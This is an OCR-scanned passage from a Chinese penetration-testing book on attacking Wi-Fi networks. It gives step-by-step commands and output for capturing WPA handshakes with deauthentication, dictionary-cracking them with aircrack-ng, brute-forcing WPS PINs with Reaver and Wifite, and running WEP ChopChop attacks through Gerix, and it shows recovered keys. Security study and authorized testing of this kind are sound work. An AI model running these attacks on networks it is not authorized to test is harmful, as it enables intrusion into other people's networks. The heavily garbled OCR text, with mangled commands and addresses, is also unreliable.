提示 为 WPA CCMP PSK。 当 使 用 aireplay-ng 进 行 攻击 后 ， 同 样 获取 到 WPA 握 手数 
; 在 人 破解 时 需要 提供 一 个 密码 字典 。 下 面料 介绍 破解 WPA/WPA2 无 线 网 
络 的 方法 。 


使 用 aircrack-ng 破 解 WPA/WPA2 无 线 网 络 的 具体 操作 步骤 如 下 所 示 。 
(1) 查看 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 


kali:~# airmon-ng 
Interface Chipset Driver 


wlanO Ralink RT2870/3070 ^ rt2800usb - [phy] 
(2) 停止 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 

root@kali:~# airmon-ng stop wlan0 # 停 止 wano 接口 

Interface Chipset Driver 

wilan0 Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode disabled) 


(3) 修改 无 线 网 卡 MAC 地 址 。 执 行 命 令 如 下 所 示 : 


root@kali:~# macchanger --mac 00:11:22:33:44:55 wlanO 
Permanent MAC: 00:c1:40:76:05:6c (unknown) 

Current MAC: 00:c1:40:76:05:6c (unknown) 

New MAC: 00:11:22:33:44:55 (Cimsys Inc) 


(4) 启用 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 


root@kali:~# airmon-ng start wlanO 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 
-8 

PID Name 

2567 NetworkManager 

2/16 dhclient 


15609 wpa supplicant 
Interface Chipset Driver 
wlanü Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode enabled on mong) 


(5) RAGE. WATT RAM : 


root@kali:~# airodump-ng -c 1 -w abe --bssid 14:EG:EA:AC:FB:20 mont 
CH 1 J[ Elapsed: 3 mins ][ 2014-05-15 17:53 ][ WPA handshake: 14:E6:E4:AC:FB:20 


BSSID PWR RXQ Beacons #Data,#/s CH MB ENC CIPHER AUTH  ESSID 


14:E6:E4:AC:FB:20 -47 0 1979 5466 24 1 54e. WPA2 CCMP PSK Test 


BSSID STATION PWR Rate Lost Frames Probe 
14:E6:E4:AC:FB:20 18:DC:56:F0:62:AF -127 Üe-De 0 481 
14:E6:E4:AC:FB:20 08:10:77:0A:53:43 -32 0-1 40 5035 
14:E6:EA4:AG:FB:20 08:10:77 7:0A:53:43 -30 0-1 46 5039 


(6) 对 无 线路 由 器 Test 进 行 Deauth 攻 击 。 执 行 命令 如 下 所 示 : 


root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:: 
17:50:27 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on ché 
17:50:30 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [1: 





(7) 破解 密码 。 执 行 命 分 如 下 所 示 : 


root@Kali:~# aircrack-ng -w ./dic/wordlist wirelessattack-01.cap 
Opening wirelessattack-01.cap 
Read 2776 packets. 
# BSSID ESSID Encryption 
1 14:E6:E4:AC:FB:20 Test WPA, (1 handshake) 
Choosing first network as target. 
Opening abc-01.cap 
Reading packets, please wait... 
Aircrack-ng 1.2 beta 
[00:04:50] 1 keys tested (500.88 k/s) 
KEY FOUND! [ daxueba ] 
Master Key . B2 51 6F 21 66 DS 19 BF 40 F8 9E 87 41 ED 85 81 
51 69 8F 1C AO CA A8 5B 59 58 BD F2 06 34 8B F2 
Transient Key : AA 7B 30 94 92 EC CE 63 EB FO 28 84 00 BA 74 0A 
FF 6A 00 15 B7 18 01 47 AO BF 78 9D 9C 23 8B 8E 
OB 7C 73 52 DF 35 CB C9 30 22 SE FB 84 A2 9B 1A 
F241 02 66 A1 16 5B 79 74 FB OB ED 97 E2 94 12 
EAPOL HMAC :88 FC 8B 09 41 7C 67 BC 75 61 F7 45 CB 88 F6 BF 


从 输出 的 信息 中 可 以 看 到 无 线路 由 器 的 密码 已 经 成 功 破 解 。 在 KEY FOUND 提示 的 
右 侧 可 以 看 到 密码 已 被 破解 出 ， 为 daxueba， 破 解 速度 约 为 500.88 k/s- 


9.2.3 攻击 WPS (Wi-Fi Proteced Setup) 


WPS 是 由 Wi-Fi 联 盟 所 推出 的 全 新 Wi-Fi 安 全 防护 设 定 标准 。 该 标准 主要 是 为 了 解决 
无 线 网 络 加 密 认 证 设 定 的 步骤 过 于 繁 末 的 弊病 。 因 为 通常 用 户 往往 会 因为 设置 步骤 
太 麻 烦 ， 以 至 于 不 做 任何 加 密 安 全 设 定 ， 从 而 引起 许多 安全 上 的 问题 。 所 以 很 多 人 
使 用 WPS 设 置 无 线 设备 ， 可 以 通过 个 人 识别 码 (PIN) 或 按钮 (PBC) 取代 输入 一 
个 很 基 的 密码 短语 。 当 开 书 该 功能 后 ， 攻 击 者 束 可 以 使 用 暴力 攻击 的 方法 来 攻击 
WPS。 本 小 节 将 介绍 使 用 各 种 工具 攻击 WPS。 


现在 大 部 分 路 由 器 上 都 支持 WPS 功 能 。 以 前 路 由 器 有 专门 的 WPS 设 置 ， 现 在 的 路 
由 器 使 用 QSS 功 能 取代 了 。 这 里 以 TP-LINK 型 号 为 例 ， 介 绍 设置 WPS 功 能 ， 如 图 

9.15 所 示 。 如 果 使 用 WPS 的 PBC 方 式 ， 只 需要 按 下 路 由 器 上 的 QSS/RESET 按 和 纽 就 
可 以 了 。 





QS3 功 能 : 
H APINA: 
添加 新 设备 : 





图 9.15 iz 1aWPS 


从 该 界面 可 以 看 到 QSS 功 能 已 开店， 可 以 看 到 当前 的 PIN 码 是 04588306。 这 里 可 以 
重新 生成 新 的 PIN 码 ， 或 者 恢复 初始 PIN 码 。 


【实例 9-1】 使 用 Reaver 破 解 WPS。 具 体操 作 步 又 如 下 所 示 。 


(1) 插入 无 线 网 卡 ， 使 用 ifconfig 命 令 查 看 无 线 网 卡 是 否 已 经 正确 插入 。 执 行 命令 
如 下 所 示 : 


root@Kali:~# ifconfig 
ethO Link encap:Ethernet HWaddr 00:19:21:3f:c3:e5 
inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0 
inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:10541 errors:0 dropped:0 overruns:0 frame:0 
TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB) 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:65536 Metric:1 
RX packets:296 errors:0 dropped:0 overruns:0 frame:0 
TX packets:296 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB) 


E 一 


从 输出 的 信息 中 可 以 看 到 ， 只 有 一 个 以 太 网 接口 eth0。 这 是 因为 无 线 网 卡 可 能 没 
和 启动， 首先 来 启动 该 无 线 网 卡 。 执 行 命令 如 下 所 示 : 


root@Kali:~# ifconfig wlanO up 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 此 时 再 次 执行 ifconfig 命 令 ， 查 看 无 线 网 络 是 
个 已 启动 ， 如 下 所 示 : 


root@Kali:~# ifconfig 

wlanO Link encap:Ethernet HWaddr 08:10:76:49:c3:cd 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0O dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


看 到 以 上 输出 信息 ， 则 表示 无 线 网 卡 已 成 功 启动 ， 其 网 络 接口 为 wlan0。 


(2) 启动 无 线 网 卡 为 监听 模式 。 执 行 命 分 如 下 所 示 : 


root@kali:~# airmon-ng start wlan 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 
B 

PID Name 

2618 NetworkManager 

23/0 wpa_supplicant 


2/052 dhclient 
Interface Chipset Driver 
wlan Ralink RT2870/3070 rt2800usb - [phy16] 


(monitor mode enabled on monb) 


从 输出 的 信息 中 ， 可 以 看 到 monitor mode enabled on mon0， 表 示 无 线 网 卡 已 启动 
监听 模式 。 在 以 上 信息 中 ， 还 可 以 看 到 无 线 网 卡 的 心 片 级 驱动 类 型 。 其 中 ， 该 网 卡 
的 心 片 为 Ralink， 默 认 驱 动 为 rt2800usb。 


i. : 执行 以 上 命令 启动 监听 模式 ， 一 定 要 确定 正确 识别 无 线 网 卡 的 必 片 和 
了 驱动。 否则 ， 该 无 线 网 卡 可 能 导致 攻击 失败 。 


(3) 攻击 WPS。 执 行 命 全 如 下 所 示 : 


root@kali:~# reaver -i monO -b 14:E6:E4:AC:FB:20 -vv 

Reaver v1.4 WiFi Protected Setup Attack Tool 

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner «che! 
[+] Waiting for beacon from 14:E6:E4:AC:FB: 20 

[+] Switching monO to channel 
[+] Switching monO to channel 
[+] Switching monO to channel 
[+] Switching mono to channel 
[+] Switching monO to channel 
[+] Switching monO to channel 
[+] Switching monO to channel 
[+] Switching monO to channel 
[+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty) 
[+] Trying pin 12345670 

[+] Sending EAPOL START request 

[+] Received identity request 

[*] Sending identity response 

[+] Received identity request 

[+] Sending identity response 

[+] Received M1 message 

[*] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 message 

[+] Received WSC NACK 

[+] Sending WSC NACK 


OOPRPPODP 
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从 以 上 输 Aan 可 以 看 到 正在 等 待 连 接 到 14:E6:E4:AC:FB:20 无 线路 由 器 的 信 
号 。 并 且 通 过 发 送 PIN 信息 ， 获 取 密 码 。 


如 果 没 有 路 由 器 没有 开启 WPS 的 话 ， 将 会 出 现 如 下 所 示 的 信息 : 


[!] WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XxX) 
a] pice 


Fern WiFi Cracker 是 一 个 非 负 不 错 的 工具 ， 用 来 测试 无 线 网 络 安 全 。 后面 将 会 介绍 
使 用 该 工具 ， 攻 击 Wi-Fi 网 络 。 这 里 首先 介绍 使 用 Fern WiFi Cracker 工 具 来 攻击 
WPS, 


【实例 9-2】 使 用 Wifite 攻 击 WPS。 上 有 具体 操作 步骤 如 下 所 示 。 


(1) 启动 Wifite 工 具 ， 并 指定 使 用 common.txt 密 码 字 典 。 在 命令 行 终端 执行 如 下 所 
sane . 





root@kali:~# wifite -dict common.txt 


执行 以 上 命 分 后 ， 将 显示 如 下 所 示 的 信息 : 


oe ". ". — WiFite v2 (r85) 


son i (d) : 7 zs automated wireless auditor 
iM ecc NO rcr a css 
NNI / 4 . Q4 designed for Linux 
a | \ 5 
/ \ 


[+] WPA dictionary set to common.txt 

[+] scanning for wireless devices... 
[+] initializing scan (monQ), updates at 5 sec intervals, CTRL+C when ready. 
[0:00:14] scanning wireless networks. 0 targets and 1 client found 


以 上 信息 显示 了 WiFite 工 具 的 版 本 信息 ， 支 持平 台 ， 并 且 开 始 扫描 无 线 网 络 。 当 扫 
摘 到 想 要 破解 的 无 线 网 络 时 ， 按 下 CTRL+C 组 合 键 俘 止 扫 摘 。 


(2) 仿 止 扫 揪 无 线 网 络 ， 将 显示 如 下 所 示 的 信息 : 


[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready. 


NUM ESSID CH ENCR POWER WPS? CLIENT 
1 vzty 11 WPA?2 # £65db wps 
2 Test 1 WPA2 S2db wps 
3 CMCC-AUTO 1 WPA2 29db no 
4 CMCC-LIU 6 WPA2 28db wps 
5 TP-LINK D7118A 1 WPA2  -13db wps clients 


[0:00:37] scanning wireless networks. 5 targets and 3 clients found 
[+] checking for WPS compatibility... done 


NUM ESSID CH ENCR POWER WPS? CLIENT 
1 yzty 11 WPA2 65db wps 
2 Test 1 WPA2  S2db wps 
3 CMCC-AUTO 1 WPA2 29db no 
4 CMCC-LIU 6 WPA2 28db wps 
9  [P-LINK D7118A 1 WPA2 -13db Wps clients 


[+] select target numbers (1-5) separated by commas, or 'all": 


从 以 上 输出 信息 中 ， 可 以 看 到 扫 摘 到 五 个 无 线 接 人 点 和 三 个 客户 端 。 在 输出 信息 
中 ， 共 显示 了 7 列 。 分 别 表 示 无 线 接 人 点 编号 、ESSID 号 、 人 信道、 加 密 方 式 、 电 功 
率 、 是 否 开启 wps 和 客户 端 。 如 果 仅 有 一 个 客户 疹 连 接 到 无 线 援 入 点 ， 则 CLIENT 列 
显示 是 client。 如 果 有 多 个 客户 端 连 接 的 话 ， 则 显示 是 clients。 


(3) 此 时 ， 选 择 要 攻击 的 无 线 援 人 点 。 这 里 选择 第 五 个 无 线 援 人 损 ， 输 入 “人 个。 然 
后 按 下 回 车 键 将 开始 攻击 ， 显 示 信 息 如 下 所 示 : 


[+] select target numbers (1-5) separated by commas, or 'all': 1 
[+] 1 target selected. 
[0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA) 
[0:11:00] WPS attack, 0/0 success/ttl, 
[!] unable to complete successful try in 660 seconds 
[*] skipping yzty 
[0:08:20] starting wpa handshake capture on "yzty" 
[0:08:11] new client found: 18:DC:56:F0:62:AF 
[0:08:09] listening for handshake.. 
[0:00:11] handshake captured! saved as "hs/yzty EC-17-2F-46-70-BA 
[+] 2 attacks completed: 
[+] 1/2 WPA attacks succeeded 
yzty (EC:17:2F:46:70:BA) handshake captured 
saved as hs/yzty EC-17-2F-46-70-BA.cap 
[+] starting WPA cracker on 1 handshake 
[0:00:00] cracking yzty with aircrack-ng 
[+] cracked yzty (EC:17:2F:46:70:BA)! 
[+] key: "“huolong5" 
[+] quitting 


z_zEP SSS EEE 
人 输出 的 信息 中 ， 可 以 看 到 破解 出 yzty 无 线 设备 的 密码 为 huolong5。 





9.3 Gerix Wifi Cracker 破 解 无 线 网 络 


Gerix Wifi Cracker 是 另 一 个 aircrack 图 形 用 户 界 面 的 无 线 网 络 破解 工具 。 本 节 将 介 
绍 使 用 该 工具 破解 无 线 网 络 及 创建 假 的 接 入 点 。 


9.3.1 Gerix 破 解 WEP 加 密 的 无 线 网 络 


在 前 面 介绍 了 手动 使 用 Aircrack-ng 破 解 WEP 和 WPA/WPA2 加 密 的 无 线 网 络 。 为 了 
方便 ， 本 小 节 将 介绍 使 用 Gerix 工 具 自 动 地 攻击 无 线 网 络 。 使 用 Gerix 攻 击 WEP 加 密 
的 无 线 网 络 。 具 体操 作 步 骤 如 下 所 示 。 


(1) 下 载 Gerix 软 件 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# wget https://bitbucket.org/SkKin36/gerix-wifi-cracker -| 
--2014-05-13 09:50:38-- https://bitbucket.org/SKin36/gerix-wifi- ci 
正在 解析 主机 bitbucket.org (bitbucket.org)... 131.103.20.167, 131.103.: 
正在 连接 bitbucket.org (bitbucket.org)|131.103.20.167|:443.. 已 连接 。 
已 发 出 HTTP 请 求 ， 正 在 等 待 回应 ... 302 FOUND 

(ie : http://cdn.bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/down: 
- -2014-05-13 09:50:40-- http://cdn.bitbucket.org/Skin36/gerix-wifi: 
正在 解析 主机 cdn.bitbucket.org (cdn.bitbucket.org).. 54.230.65.88, 216 
正在 连接 cdn.bitbucket.org (cdn.bitbucket.org)|54.230.65.88|:80.. 已 过 
已 发 出 HTTP 请 求 ， 正 在 等 待 回应 ... 200 OK 

KE : 87525 (85K) [binary/octet-stream] 

EERE : “gerix-wifi-cracker-master.rar” 
10096[222222-222-2-2-2-2-2z2z2z2-2z-2-2-2-2----2-------zzz-z»] 87,525 177K/s 用 时 
2014-05-13 09:50:41 (177 KB/s) - 已 保存 “gerix-wifi-cracker-master ,ri 


a] 0 | ne 
从 输出 的 结果 可 以 看 到 gerix-wifi-cracker-master.rar 文 件 已 下 载 完 成 ， 并 保存 在 当前 
目录 Fo 

(2) 解压 Gerix 软 件 包 。 执 行 命 爷 如 下 所 示 : 


rooti@ kali:~# unrar x gerix-wifi-cracker-master.rar 
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal 
Extracting from gerix-wifi-cracker-master.rar 





Creating — gerix-wifi-cracker-master OK 
Extracting gerix-wifi-cracker-master/CHANGELOG OK 
Extracting gerix-wifi-cracker-master/gerix.png OK 
Extracting gerix-wifi-cracker-master/gerix.py OK 
Extracting  gerix-wifi-cracker-master/gerix.ui OK 
Extracting  gerix-wifi-cracker-master/gerix.ui.h OK 
Extracting gerix-wifi-cracker-master/gerix_config.py OK 
Extracting gerix-wifi-cracker-master/gerix_config.pyc OK 
Extracting gerix-wifi-cracker-master/gerix_qui.py OK 
Extracting  gerix-wifi-cracker-master/gerix gui.pyc OK 
Extracting  gerix-wifi-cracker-master/gerix wifi cracker.png OK 
Extracting gerix-wifi-cracker-master/Makefile OK 
Extracting  gerix-wifi-cracker-master/README OK 
Extracting gerix-wifi-cracker-master/README-DEV OK 


All OK 


以 上 输出 内 容 显示 了 解压 Gerix 软 件 包 的 过 程 。 从 该 过 程 中 可 以 看 到 ， 解 压 出 的 所 有 
文件 及 保存 位 置 。 


(3) 为 了 方便 管理 ， 将 解压 出 的 gerix-wifi-cracker-masger 目 录 移 动 Linux 系 统统 一 
的 目录 /usrshare 中 。 执 行 命 分 如 下 所 示 : 


root@kali:~# mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cr: 
TE] 
执行 以 上 命令 后 不 会 有 任何 输出 信息 。 

(4) 切换 到 Gerix 所 在 的 位 置 ， 并 和 启动 Gerix 工 具 。 执 行 命 分 如 下 所 示 : 





root@kali:~# cd /usr/share/gerix-wifi-cracker/ 
root@kali:/usr/share/gerix-wifi-cracker# python gerix.py 


执行 以 上 命令 后 ， 将 显示 如 图 9.16 所 示 的 界面 。 
| Gerix wifi cracker | | | | 


eS 


Welcome | Configuration WEP WPA Fake AP Cracking Database Credits 





Hello and Welcome! 

Gerix Wifi Cracker is a GUI that can help you to work in Wireless 802.11 Penetration Test 
Created by Emanuele emgent Gentili and Emanuele crossbower Acri from Gerix.IT com 
enJoy! 


09:51:41 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


- MS ul 
Gerix mim 
| A ^ security solutions 
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图 9.16 Gerix 和 启动 界面 


(5) 从 该 界面 可 以 看 到 Gerix 数 据 库 已 加 载 成 功 。 此 时 ， 用 鼠标 切换 到 
Configuration 选 项 卡 上 ， 将 显示 如 图 9.17 所 示 的 界面 。 


Gerix wifi cracker =u bes "HE à | 


| Welcome | Configuration | WEP WPA | Fake AP Cracking Database Credits 
L | | | | | : 


Directory for session files (logs, .cap, 3 - 























\/root/.gerix-wifi-cracker/ || Clean old session files 














Select the interface: 
Interfece MAC Chipset Driver Mode 
l wlanl Q0:c1:40:7.. Ralink RT28... rt280Qusb ... Managed 


| Reload wireless interfaces | Set random MAC address | Enable/Disable Monitor Mode 





Select the target network: 
Essid Bssid Channel Signal Enc 
Channel: | all channels 2 | seconds: |10 B | Rescan networks 


| liz —— — Oe ——— =e 


>| 





| 14:02:37 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


Gerix IT 5325; 


49.17 基本 设置 界面 


(6) 从 该 界面 可 以 看 到 只 有 一 个 无 线 接口 。 所 以 ， 现 在 要 进行 一 个 配置 。 在 该 界 
面 选 择 接口 wlan1， 单 击 Enable/Disable Monitor Mode 按 钮 ， 将 显示 如 图 9.18 所 示 
的 界面 。 
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Gerix wifi cracker 


Welcome | Configuration | WEP WPA Fake AP Cracking Database Credits 





Directory for session files (logs, .cap, ...): 





/root/.gerix-wifi-cracker/ Clean old session files 


























Select the interface: 


Interfece MAC Chipset Driver Mode 
. Ralink RT28... rt2800usb ... Managed 


























. Ralink RT 28... rt28O00usb ... Monitor 














Enable/Disable Monitor Mode 


Reload wireless interfaces Set random MAC address | 





Select the target network: 





Essid Bssid Channel Signal Enc 


Channel: | all channels 2 | Seconds: Rescan networks 














14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlanl [Success] 















Gerix IT 2:33. 


图 9.18 启动 Wlan1 为 监听 模式 


(7) 从 该 界面 可 以 看 到 wlan1 成 功 和 启动 为 监听 模式 。 此 时 使 用 鼠标 选择 mon0， 在 
Select the target network 下 单 击 Rescan networks 按 钮 ， 显 示 的 界面 如 图 9.19 所 
示 。 
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Gerix wifi cracker "e" x 


Welcome | Configuration | WEP | WPA | Fake AP | Cracking | Database | Credits 





Directory for session files (logs, .cap, ...): 





froot/. gerix-wifi-cracker/ Clean old session files 


Select the interface: 
Interfece MAC Chipset Driver Mode 
ed ss = | = 












































00:c1:40:7.. Ralink RT 28... rt28O00usb ... Managed 








00:€1:40:7... Ralink RT 2&8... rt2800usb... Monitor 





Enable/Disable Monitor Mode 


Reload wireless interfaces 





Set random MAC address j 


Select the target network: 






































Essid Bssid Channel Signal Enc 





l2 yztxty BC 21:0A:4... 6 -38 WPA2WPA... 
= | 


m 24:50:64.4... 1 -33 WEP WEP 























Channel: all channels < | Seconds: | Rescan networks 





12:52:55 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
12:53:13 - Monitor on: wlanl [Success] 


12:53:31 - rescan networks [Success] 


Gerix IT .5552.. 





E 9.19 扫 摘 到 的 网 络 


(8) 从 该 界面 可 以 看 到 扫 摘 到 附近 的 所 有 无 线 网 络 。 本 例 中 选择 攻击 WEP 加 密 的 
无 线 网 络 ， 这 里 选择 Essid 为 Test 的 无 线 网 络 。 然 后 将 蜂 标 切换 到 WEP 选 项 卡 ， 如 
图 9.20 所 示 。 
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m 
Gerix wifi cracker 
Welcome | Configuration | WEP | WPA Fake AP Cracking Database Credits 
Welcome in WEP Attacks Control Panel 
General functionalities 
WEP Attacks (no-client) 
WEP Attacks (with clients) 
WEP Attack (with clients, in Access Point and Ad-Hoc mode) 
Caffe-Latte attack in access point mode 
Start Caffe-Latte attack 
Hirte attack in access point mode 


Start Hirte attack 








Hirte attack in ad-hoc mode 


Start Hirte attack 


























14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlanl [Success] 


Gerix IT .5555: 


security solutions 
9.20 WEP 配 值 


(9) 该 界面 用 来 配置 WEP 相 关 信 息 。 单 击 General functionalities S, Y$ x zm 
图 9.21 所 示 的 界面 。 


Gerix wifi cracker 





F 


Welcome Configuration WE p | WPA Fake AP Cracking Database Credits 
Welcome in WEP Attacks Control Panel 
General functionalities 


Functionalities 


Start sniffing and Logging 


Tests 


Performs a test of injection AP 


WEP Attacks (no-client) 
WEP Attacks (with clients) 


WEP Attack (with clients, in Access Point and Ad-Hoc mode) 


l2:52:55 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
12:53:13 - Monitor on: wlanl [Success] 
12:53:31 - rescan networks [Success] 


L 
GerIX IT 55: 
i f secunty solutions 


9.21 General functionalities? H 


(10) 该 界面 显示 了 WEP 的 攻击 方法 。 在 该 界面 的 Functionalities 下 ， 单 击 Start 
Sniffing and Logging 按 钮 ， 将 显示 如 图 9.22 所 示 的 界面 。 


r 


sniff-dump --bssid 14:E6:E4:AC:FB:2 0 monO; read; 


CH 1 JL Elapsed: 23 mins 儿 2014-05-13 13:33 


BSSID PWR RD tata, #/'s iB ENC CIPHER AUTHE 
14:Eb:E4:RL:FB:e0 -40 9 17012 26330 0 1 54e, WEP WEP OPN T 
BSSID STATION PUR Rate Lost Frames Probe 


14:Eb:EA:RC:IFB:20  00:01:40:75:05:BL 0 0-1 
14:Eb:EA:RCiFB:20 18:0C:56:F0:62:AF -536 Sde- le 














图 9.22 捕获 无 线 AP 


(11) 该 界面 显示 了 与 Test 传 输 数 据 的 无 线 AP。 然 后 在 图 9.21 中 单 击 WEP 
Attacks (no-client) 命 仿 ， 将 显示 如 图 9.23 所 示 的 界面 。 
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Gerix wifi cracker kaua X 


| Welcome | Configuration WEP WPA | Fake AP Cracking Database Credits 
= 3232: a E E E 2 LL d 


—-—— — 





Welcome in WEP Attacks Control Panel 
General functionalities 


WEP Attacks (no-client) 


ChopChop attack 
































| Start false access point Authentication on victim 




















| Start the Cho p Chop attack 





| Create the ARP packet to be injected on the victim access point 





| Inject the created packet on victim access point 




















Fragmentation attack 


| Associate with AP using fake auth 








WEP Attacks (with clients) 


WEP Attack (with clients, in Access Point and Ad-Hoc mode) 








13:02:17 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
13:02:36 - rescan networks [Success] 
13:03:47 - Sniffing and logging started with monO 

(13:05:56 = WEP: Iniection test with man 


Gerix m 2:2. 


图 9.23 ChopChop attack 


(12) 在 该 界面 单 击 Start false access point Authentication on victim 按 钮 ， 没 有 任 
何 输出 信息 。 然 后 单 击 Start the ChopChop attack 按 钮 ， 将 显示 如 图 9.24 所 示 的 界 
面 。 


9.3 Gerix Wifi Cracker 破 解 无 线 网 络 407 


bash -c "aireplay-ng -4 -h 00:C1:40:76:05:6C mon 


x a "| zn 14 par k et e de 





Size: 115, FromD5: 1, ToDS: 0 (WEP) 


BSSID 1d*EB*Ed*AC*FB*20 
Dest. MAL $5:35353:00*:00*00216 
Source MAL 18: DC :55:FO:b2*BF 
Ox0000+ O842 0000 4445 0000 0016 ldeb edac fb2d 
QwOOl10* Bde 55f0 Beat cOFO OOdb dbOO 15f2 3146 
OxO020+ 5597 0207 F55g “665 4fOe bOSF aaal //da 
Ox00430+ ETE debe iffe 44eb b45e dcf?2 c21f 
Ox0040+  25dd diec cBbB8 iced 548d 4362 Bl3e led? 
Ox0050: fled 5e/b /ltc e5/2 fd/b dd54 cd3c 7/890 
Jb: 2cd0 Sib? sadb dc2c 860a 5047 fadh 5d9e 
Ox00/0* 


P 


Use this packet ‘f y 


图 9.24 捕获 的 数据 乌 


(13) 该 界面 是 抓 取 数据 包 的 过 程 。 当 捕获 到 无 线 AP 时 ， 将 显示 Use this 
packet?。 此 时 输入 y 将 开始 捕获 数据 ， 生 成 一 个 名 为 .cap 文 件 ， 如 图 9.25 所 示 。 


bash -c "aireplay-ng -4 -h 08:10:77:0A:53:43 mon’ 


lf f set 40 (S12 done) | xor = 94 | pt = 00 | 1085 frames written in 18589m 
Sent. 8018 packets. current guess: 32 


The AP appears to drop packets shorter than 40 butes. 
nabling standard workaround: IP header re-creation, 


This doesn't look like an IP packet, try another one, 


Warning: ICV checksum verification FAILED! Trying workaround, 


he AP appears to drop 


"E | - " = E 
nablinaà standard 
| loot 


- e me 


lorkaround could 


jn't fix ICV checksum, 
likely invalid/useless 


Packet is most 
Try another one, 


saving plaintext 


^A "ng keustrean 
Lompleted in 1/bes 


图 9.25 生成 .cap 文 件 


(14) 从 该 界面 可 以 看 到 将 捕获 到 的 数据 包 保 存 到 replay_dec-0514-162307.cap 文 
件 中 ， 该 文件 用 于 攻击 的 时 候 使 用 。 在 图 9.25 中 ， 可 能 会 出 现 如 图 9.26 所 示 的 错 


IRo 


bash -c "aireplay-ng -4 -h 00:C1:40:76:05:6C mon 
Ox00b0: ef2c 3517 85af elfe le6f 7bd4 eBdf eBce .5..,.,.of,.,，,， 
Ox00c0: b314 c609 6885 2991 F363 f10f fald aead .,...h.)..C....«. 
0x00d0* 42F6 da34 0d15 276e af7d 375c 7b98 adec B,.4,.'n.t7 <1... 
=== [UT --- 
Use this packet ? y 


saving chosen packet in replay_src-05145-144074,cap 


Sent 5064 packets, current guess! 23 


0 EN 


t You're trying to inject with an unsupported chipset (Centrino?), 
* The driver source wasn't properly patched for injection support, 
* You are too far from the AP, Get closer or reduce the send rate, 
* Target is 802,119 only but you are using a Prism2 or RTL8180, 
t The wireless interface isn't setup on ti 
* The client MAL you have specified is not currently authenticated, 

Try running another aireplay-ng to fake authentication (attack "-1"), 
' The AP isn t vulnerable when operating in authenticated mode, 

Iry aireplay-ng in non-authenticated mode instead (no -h option), 





图 9.26 ChopChop attack% mx 
当 出 现 以 上 错误 时 ， 建 议 换 一 块 无 线 网 卡 。 然 后 在 图 9.23 中 依次 单 击 Create the 


ARP packet to be injected on the victim access point 和 Inject the created packet 
on victim access point 按 钮 ， 将 打开 如 图 9.27 所 示 的 界面 。 


output_FORGED mon0O; read; " 


LUN 40 1b: U0:bL ) 


ish 9254 Bb?! 


9 ddbO d157 5048 





9.27 是 否 使 用 该 数据 包 


(15) 在 该 界面 询问 是 否 Use this packet?。 


在 Use this packet ? |n sj Ay, "EXE 
的 抓 取 数据 包 。 当 捕获 的 数据 包 达 到 2 万 时 ， 单 击 Cracking 选 项 卡 ， 将 显示 如 图 
9.28 所 示 的 界面 。 


F 


Gerix wifi cracker 


Welcome Configuration WEP | WPA Fake AP | Cracking | Database Credits 


Welcome in Cracking Control Panel 
WEP cracking 


WPA bruteforce cracking 
WPA rainbow tables cracking 
Rainbow Tables cracking 


(Get rainbow tables from http://www.renderlab.net/projects/WPA-tables/ ) 
Add your rainbow tables file: 


l/root 














Crack the password with coWPAtty and Rainbow Tables 


14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlanl [Success] 


14:25:11 - rescan networks [Success] 


Gerix mass 


security solutions 


49.28 攻击 界面 


(16) 在 该 界面 单 击 WEP cracking， 将 显示 如 图 9.29 所 示 的 界面 。 


Gerix wifi cracker 


Welcome Configuration WEP WPA Fake AP | Cracking | Database | Credits 
Welcome in Cracking Control Panel 
WEP cracking 


Normal cracking 


When you have enougth packets (»5000) you can try to decrypt the password. 


Aircrack-ng - Decrypt WEP password 


WPA bruteforce cracking 
WPA rainbow tables cracking 


13:12:36 - Crackng WEP with aircrack launched (remember to save database s changes) ^ 
